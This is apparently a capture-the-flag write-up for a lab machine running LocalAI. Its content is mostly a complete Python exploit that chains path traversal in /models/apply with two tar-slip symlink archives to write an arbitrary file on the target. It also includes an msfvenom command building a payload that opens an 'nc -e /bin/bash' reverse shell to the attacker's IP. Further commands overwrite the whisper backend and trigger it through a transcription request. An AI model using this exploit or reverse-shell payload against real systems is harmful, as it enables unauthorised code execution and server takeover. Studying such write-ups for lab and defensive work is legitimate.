Aispreader (Expert)
Post

Aispreader (Expert)

Host entries
1
10.0.14.34

Content

Reconnaissance

Initial reconnaissance for TCP ports

1

Services and Versions running:

1

Exploitation

https://huntr.com/bounties/752d2376-2d9a-4e17-b462-3c267f9dd229

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
import json, time, tarfile

from io import BytesIO
from random import randbytes, randint
from pathlib import Path
from argparse import ArgumentParser
from requests import Session

from http.server import HTTPServer, BaseHTTPRequestHandler
from multiprocessing import Process, Queue


# Minimal LocalAI model-config YAML template served back to the target.
# Placeholders: model name, filename to save as, URI to download it from.
# NOTE: the template body is part of the exploit payload — do not reformat.
model_tmpl = """
name: {}
files:
  - filename: {}
    uri: {}
"""


# Cross-process queue: the main process enqueues the next payload
# (YAML config or tar bytes) and the HTTP server child process dequeues
# one payload per incoming GET request. Janky, but sufficient IPC here.
g_queue = Queue() # used for some janky ipc with http server

class HttpHandler(BaseHTTPRequestHandler):
    """Answers every GET with the next payload queued on ``g_queue``.

    The request path is ignored for routing purposes; whatever bytes the
    exploit enqueued most recently are returned as the response body.
    """

    def log_message(self, format, *args):
        # Suppress the default per-request logging to stderr.
        pass

    def do_GET(self):
        # Unconditionally reply 200 with the next queued payload.
        self.send_response(200)
        self.send_header('content-type', 'application/text')
        self.end_headers()
        payload = g_queue.get()
        print(f"response to {self.path}:", payload[:64], "...")
        self.wfile.write(payload)

def run_httpd(lhost, lport):
    """Bind an HTTP server on (lhost, lport) and serve requests forever.

    Runs in a child process; ``HttpHandler`` feeds responses from ``g_queue``.
    """
    print(f"running httpserver on {lhost}:{lport}")
    server = HTTPServer((lhost, lport), HttpHandler)
    server.serve_forever()


if __name__ == "__main__":
    # CLI:
    #   --lhost       attacker address as reachable FROM the target
    #   --url         base URL of the target LocalAI instance
    #   --local_path  local file whose contents will be planted remotely
    #   --remote_path absolute path on the target to write the file to
    parser = ArgumentParser()
    parser.add_argument("--lhost", default="localhost")
    parser.add_argument("--url", default="http://localhost:8080")
    parser.add_argument("--local_path", default="poc.txt")
    parser.add_argument("--remote_path", default="/tmp/poc.txt")
    args = parser.parse_args()

    remote_path = Path(args.remote_path)


    # --lhost is attackers host as seen from the localai, so if localai
    # runs in docker use 172.17.0.1 (or something like that depending on
    # your system), if running locally just use localhost:
    lport = randint(50000, 60000)
    attacker_url = f"http://{args.lhost}:{lport}"

    # run http service that will serve the files:
    # (child process; payloads are handed over via g_queue, one per GET)
    proc = Process(target=run_httpd, args=(args.lhost, lport))
    proc.start()
    time.sleep(1)

    with Session() as s:
        # use another vulnerability to delete the target first, because our "arbitrary"
        # write can not overwrite files, just write a new file:
        # Step 1: register a throwaway model whose "mmproj" override path-traverses
        # to remote_path, then delete the model — presumably the delete also removes
        # the traversed file (TODO confirm against the LocalAI version targeted).
        m_name = "m_" + randbytes(4).hex()
        g_queue.put(f"name: {m_name}\n".encode())
        rsp = s.post(f"{args.url}/models/apply", json={
            "url" : f"http://{args.lhost}:{lport}/{m_name}.yaml",
            "overrides" : {
                "mmproj" : f"../../../../../../../../../../{args.remote_path}",
            }
        })
        rsp = s.post(f"{args.url}/models/delete/{m_name}")

        # create a model from a config and let it download the files. If the file is an archive
        # it will automatically uncompress the contents:
        # Step 2: queue the YAML config; the target fetches it, then fetches the tar.
        m_name = "m_" + randbytes(4).hex()
        model_yaml = model_tmpl.format(m_name, f"{m_name}.tar", f"{attacker_url}/{m_name}.tar")

        g_queue.put(model_yaml.encode())
        rsp = s.post(f"{args.url}/models/apply", json={
            "url" : f"http://{args.lhost}:{lport}/{m_name}.yaml",
        })

        # create a tar file with a symlink pointing to the directory of `remote_path`.
        # Step 3: the tar's single entry is a symlink named `redirect` whose
        # link target is remote_path's parent directory.
        redirect = randbytes(4).hex()
        fake_tar = BytesIO()
        with tarfile.open(fileobj=fake_tar, mode="w") as tar:
            info = tarfile.TarInfo(redirect)
            info.type = tarfile.SYMTYPE
            info.linkname = str(remote_path.parent)
            tar.addfile(info)

        g_queue.put(fake_tar.getvalue())

        # do another tarslip, but this time save the .tar file to symlink'ed directory
        # so that the contents of this new tar are extracted there. this will allow to
        # write a file with the same attributes as `args.local_path`
        # Step 4: second model config whose filename routes through the symlink
        # planted in step 3, so extraction lands in remote_path's directory.
        m_name = "m_" + randbytes(4).hex()
        model_yaml = model_tmpl.format(m_name, f"{redirect}/{redirect}.tar", f"{attacker_url}/{m_name}.tar")
        g_queue.put(model_yaml.encode())

        rsp = s.post(f"{args.url}/models/apply", json={
            "url" : f"http://{args.lhost}:{lport}/{m_name}.yaml",
        })

        # Step 5: the final tar carries local_path, named so it extracts
        # exactly as remote_path's basename inside the symlinked directory.
        fake_tar = BytesIO()
        with tarfile.open(fileobj=fake_tar, mode="w") as tar:
            tar.add(args.local_path, arcname=str(remote_path.name))

        g_queue.put(fake_tar.getvalue())

        time.sleep(1)
        # Keep the HTTP server alive until the operator confirms the target
        # has finished downloading (model apply is asynchronous on the target).
        input("press enter to continue...")

    proc.kill()

1
msfvenom -p linux/x64/exec CMD='nc -e /bin/bash 10.10.5.122 1234' -f elf-so > pwn
1
python exploit.py --url='http://10.0.14.34:8080' --lhost='10.10.5.122' --remote_path='/tmp/localai/backend_data/backend-assets/grpc/whisper' --local_path='pwn'
1
curl https://upload.wikimedia.org/wikipedia/commons/1/1f/George_W_Bush_Columbia_FINAL.ogg -o test.ogg
1
curl http://10.0.14.34:8080/models/apply -H 'Content-Type: application/json' -d '{"id":"whisper-base-en-q5_1"}'
1
curl http://10.0.14.34:8080/v1/audio/transcriptions -H 'Content-Type: multipart/form-data' -F file='@test.ogg' -F model='whisper-base-en-q5_1'
1

Privilege Escalation

Post Exploitation

Credentials

Notes

  • Chisel has different configurations; this time we used a Forward SOCKS Proxy, which behaves like a bind shell. This is not necessarily the easiest way to forward the remote port, but it is a useful approach to keep in mind in case a reverse shell is not possible.
  • Always look for public exploits, analyze them, and check whether anything in them can be reused to exploit the machine.
  • Chisel has some

References